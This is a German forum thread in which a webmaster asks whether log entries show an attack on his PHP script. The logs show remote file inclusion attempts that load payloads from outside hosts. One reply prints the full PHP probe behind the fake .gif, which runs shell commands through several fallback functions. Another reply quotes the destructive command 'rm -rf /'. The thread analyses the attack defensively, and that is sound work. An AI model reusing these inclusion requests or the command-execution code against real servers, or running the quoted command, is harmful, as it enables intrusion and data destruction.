Versucht da jemand mein Script zu hacken?

[resoucer]

Hallo, undzwar habe ich im Adminbereich die Möglichkeit mir die aktuellen Zugriffe anzuzeigen.
Da fällt mir auf das dort 3 Ips sind, die versuchen "Schadsoftware" zu laden

00:05:24 	0 	Guest 	212.227.65.7* 	01:13:50 	01:13:50 	/index.php?incl=https://moop.moomoo.co.il/sdsdf.gif?? 
00:05:24 	0 	Guest 	212.227.65.7*	01:13:50 	01:13:50 	/index.php?incl=https://www.dga-gaggenau.de/genussakademie/cms/cache/com_banners/desmodos.txt?? 
00:05:24 	0 	Guest 	84.1*.180.232 	01:13:50 	01:13:50 	/index.php?incl=https://moop.moomoo.co.il/sdsdf.gif?? 
00:05:24 	0 	Guest 	84.1*.180.232 	01:13:50 	01:13:50 	/index.php?incl=https://moop.moomoo.co.il/sdsdf.gif??? 
00:05:25 	0 	Guest 	212.227.65.7* 	01:13:49 	01:13:49 	/index.php?incl=https://www.fsj-sh.de//images/stories/desmodos.txt?? 
00:05:27 	0 	Guest 	212.227.65.7*	01:13:47 	01:13:47 	/index.php?incl=https://moop.moomoo.co.il/sdsdf.gif?? 
00:05:29 	0 	Guest 	217.172.182.20* 	01:13:45 	01:13:45 	/index.php?incl=https://www.fsj-sh.de//images/stories/desmodos.txt?? 
00:05:29 	0 	Guest 	217.172.182.20*	01:13:45 	01:13:45 	/index.php?incl=https://moop.moomoo.co.il/sdsdf.gif??

Kann das einer bestätigen?

 

[smoker_on_line]

sieht auf jedenfall komisch aus... das angebliche gif ist ein script:

<?
$dir = @getcwd();
echo "Mic22<br>";
$OS = @PHP_UNAME();
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir);

if ($free === FALSE) {$free = 0;}

if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";

$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}

function view_size($size)

{

if (!is_numeric($size)) {return FALSE;}

else

{

if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}

elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}

else {$size = $size . " B";}

return $size;

}}

exit;

das andere also die txt datei sieht auch böse aus

p.s.:
ich glaube ich würde die IPs aber erstmal clearen. glaube nicht dass man die einfach offen posten darf!

 

[flashas]

ich glaube ich würde die IPs aber erstmal clearen

Da hast du ja ein klasse Word invented. So mixed klingt das auch viel better.

Das Script jedenfalls sieht mehr recht unprofessionell aus, aber es wird wohl nicht nur bei deiner Seite versucht angewandt zu werden.

 

[resoucer]

Die IPs stammen auch noch von Deutschen Anbietern

1&1 Internet AG
Keyweb AG IP Network
SERVER4YOU Dedicated Server Hosting

 

[smoker_on_line]

Da hast du ja ein klasse Word invented. So mixed klingt das auch viel better.

Das Script jedenfalls sieht mehr recht unprofessionell aus, aber es wird wohl nicht nur bei deiner Seite versucht angewandt zu werden.

oh... entschuldige bitte viel mals. habe da wohl nicht aufgepasst was ich da zusammen schreibe. ich werde mir in zukunft mehr mühe geben. versprochen!

 

[theHacker]

Das is halt n Script-Kiddie, was n bisschen ausprobiert. Der gepostete Code versucht ja nur, ein paar Systeminformationen rauszulesen.

Solange kein

rm -rf /

drinsteht, is alles paletti

Viele Leute inkludieren ja einfach eine Datei, die über GET/POST geliefert wird und wenn dann noch die file_wrapper aktiv sind und der include_path nicht ordentlich gesetzt is, wird das fremde Script tatsächlich auf deinem Server ausgeführt.

Zieht man noch die Tatsache der Kinderzimmer-Hoster in Betracht, also dass viele sich n Root-Server mieten, keine Ahnung von Administration haben (ich hab das oft schon live erlebt), aber Webspace verkaufen wollen, dann ist die Wahrscheinlichkeit, dass so ein primitiver Angriffsversuch glückt, gar nicht mal so schlecht.